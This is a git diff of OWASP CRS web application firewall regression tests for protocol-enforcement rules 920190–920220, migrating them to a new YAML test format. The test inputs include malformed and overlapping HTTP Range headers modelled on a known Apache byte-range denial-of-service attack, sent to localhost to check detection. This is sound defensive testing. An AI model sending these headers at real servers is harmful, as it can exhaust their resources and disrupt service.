- enabled: true - name: "920190.yaml" - description: "Description" +rule_id: 920190 tests: - - test_title: 920190-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "0-1" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: HTTP/1.1 - output: - no_log_contains: id "920190" - - test_title: 920190-2 + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "0-1" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: HTTP/1.1 + output: + log: + no_expect_ids: [920190] + - test_id: 2 desc: 'Range: Invalid Last Byte Value (920190) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: / - version: HTTP/1.1 - output: - log_contains: id "920190" - - test_title: 920190-3 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: / + version: HTTP/1.1 + output: + log: + expect_ids: [920190] + - test_id: 3 desc: "Status Page Test - Request-Range header field with range end less than range start" stages: - - stage: - input: - dest_addr: "127.0.0.1" - method: "GET" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Request-Range: bytes=64-0 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920190\"" + - input: + dest_addr: "127.0.0.1" + method: "GET" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Request-Range: bytes=64-0 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920190] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml index 07c81eacd..dc322f386 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920200.yaml @@ -1,172 +1,170 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920200.yaml" - description: "Description" +rule_id: 920200 tests: - - test_title: 920200-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10,11-20,21-30,31-40,41-50,51-60" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] - # Sample taken from https://github.com/alienwithin/php-utilities/blob/master/apache-byte-range-server-dos/apache_byte_range_server_dos.php - test_title: 920200-2 + test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Request-Range: "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10,11-11" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920200\"" - - test_title: 920200-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-10, 11-20, 21-30, 31-40, 41-50" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=-10,-, 21-30,31-40,41-50,51-500," + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920200\"" - - test_title: 920200-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Range: "bytes=1-,11-20, 21-30,31-40,41-50,51-500" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 6 desc: 'Range: Too many fields (920200) from old modsec regressions' stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + Range: bytes=0-,5-0,5-1,5-2,5-3,5-4,5-5,5-6,5-7,5-8,5-9,5-10,5-11,5-12,5-13,5-14,5-15 + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 7 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: bytes=10-11, 20-21, 30-31, 40-41, 50-51 + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 8 desc: "This should FAIL with rule 920200 (PL2)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.html" - version: "HTTP/1.1" - output: - log_contains: id "920200" - - test_title: 920200-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.html" + version: "HTTP/1.1" + output: + log: + expect_ids: [920200] + - test_id: 9 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" - - test_title: 920200-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] + - test_id: 10 desc: This should PASS (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - no_log_contains: id "920200" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920200] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml index 5d9e663d9..cdeed77c4 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920201.yaml @@ -1,41 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920201.yaml" description: "Tests for 920201" +rule_id: 920201 tests: - - test_title: 920201-1 + - test_id: 1 desc: This should FAIL with rule 920201 (PL2) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" - - test_title: 920201-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920201] + - test_id: 2 desc: This should FAIL with rule 920201 (PL2), filename URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920201" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61, 70-71, 80-81, 90-91, 100-101, 110-11, 120-21, 130-31, 140-41, 150-51, 160-61, 170-71, 180-81, 190-91, 200-101, 210-11, 220-21, 230-31, 240-41, 250-51, 260-61, 270-71, 280-81, 290-91, 300-101, 310-311, 320-321, 330-331, 340-341, 350-351, 360-361, 370-371, 380-381, 390-391, 400-401, 410-411, 420-421, 430-431, 440-441, 450-451, 460-461, 470-471, 480-481, 490-491, 500-501, 510-511, 520-521, 530-531, 540-541, 550-551, 560-561, 570-571, 580-581, 590-591, 600-601, 610-611, 620-621, 630-631" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920201] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml index e5c9c3be3..8e6babaca 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920202.yaml @@ -1,41 +1,40 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920202.yaml" description: "Tests for 920202" +rule_id: 920202 tests: - - test_title: 920202-1 + - test_id: 1 desc: This should FAIL with rule 920202 (PL4) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index.pdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" - - test_title: 920202-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index.pdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920202] + - test_id: 2 desc: This should FAIL with rule 920202 (PL4), file name URI encoded stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: GET - port: 80 - uri: "/get/index%2Epdf" - version: "HTTP/1.1" - output: - log_contains: id "920202" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + Range: "bytes=10-11, 20-21, 30-31, 40-41, 50-51, 60-61" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: GET + port: 80 + uri: "/get/index%2Epdf" + version: "HTTP/1.1" + output: + log: + expect_ids: [920202] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml index 4e7f952d6..69f531288 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920210.yaml @@ -1,122 +1,121 @@ --- meta: author: "csanders-git, azurit" - enabled: true - name: "920210.yaml" description: "Tests that trigger rule 920210" +rule_id: 920210 tests: - - test_title: 920210-1 + - test_id: 1 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-2 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920210] + - test_id: 2 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,keep-alive" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-3 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,keep-alive" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 3 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "keep-alive,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-4 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "keep-alive,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 4 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "close,close" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: "id \"920210\"" - - test_title: 920210-5 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "close,close" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 5 stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Connection: "User-Agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - uri: "/" - version: "HTTP/1.1" - output: - no_log_contains: "id \"920210\"" - - test_title: 920210-6 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Connection: "User-Agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + uri: "/" + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920210] + - test_id: 6 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: keep-alive, keep-alive - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" - - test_title: 920210-7 + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: keep-alive, keep-alive + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] + - test_id: 7 desc: Multiple/Conflicting Connection Header Data Found (920210) from old modsec regressions stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - Accept-Language: en-us,en;q=0.5 - Connection: close, close - Host: localhost - Keep-Alive: '300' - Proxy-Connection: keep-alive - User-Agent: "OWASP CRS test agent" - method: GET - port: 80 - uri: "/" - version: "HTTP/1.1" - output: - log_contains: id "920210" + - input: + dest_addr: 127.0.0.1 + headers: + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Language: en-us,en;q=0.5 + Connection: close, close + Host: localhost + Keep-Alive: '300' + Proxy-Connection: keep-alive + User-Agent: "OWASP CRS test agent" + method: GET + port: 80 + uri: "/" + version: "HTTP/1.1" + output: + log: + expect_ids: [920210] diff --git a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml index 1ef7bba65..4f321727b 100644 --- a/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml +++ b/tests/regression/tests/REQUEST-920-PROTOCOL-ENFORCEMENT/920220.yaml @@ -1,129 +1,128 @@ --- meta: author: "csanders-git, Max Leske, azurit" - enabled: true - name: "920220.yaml" description: "Detect invalid URI encoding in the request URI" +rule_id: 920220 tests: - - test_title: 920220-1 - description: Detect invalid URI encoding in decoded URI (`%w20`) + - test_id: 1 + desc: Detect invalid URI encoding in decoded URI (`%w20`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%25w20" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-2 - description: Detect invalid URI encoding in decoded URI (`%1G`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%25w20" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 2 + desc: Detect invalid URI encoding in decoded URI (`%1G`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?x=%251G" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - log_contains: "id \"920220\"" - - test_title: 920220-3 - description: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?x=%251G" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + expect_ids: [920220] + - test_id: 3 + desc: Do not trigger for valid URI encoding in decoded URI (`xyz zyx`) stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "get/?x=xyz%20zyx" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-4 - description: Do not trigger for spaces encoded as `+`, which is valid + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "get/?x=xyz%20zyx" + headers: + User-Agent: "OWASP CRS test agent" + Host: "localhost" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + version: "HTTP/1.1" + output: + log: + no_expect_ids: [920220] + - test_id: 4 + desc: Do not trigger for spaces encoded as `+`, which is valid stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - uri: "/get?test=This+is+a+test" - headers: - User-Agent: "OWASP CRS test agent" - Host: "localhost" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - version: "HTTP/1.1" - output: - no_log_contains: "id \"920220\"" - - test_title: 920220-5 - description: | + - input: + dest_addr: "127.0.0.1" + port: 80 + uri: "/get?test=This+is+a+test" + 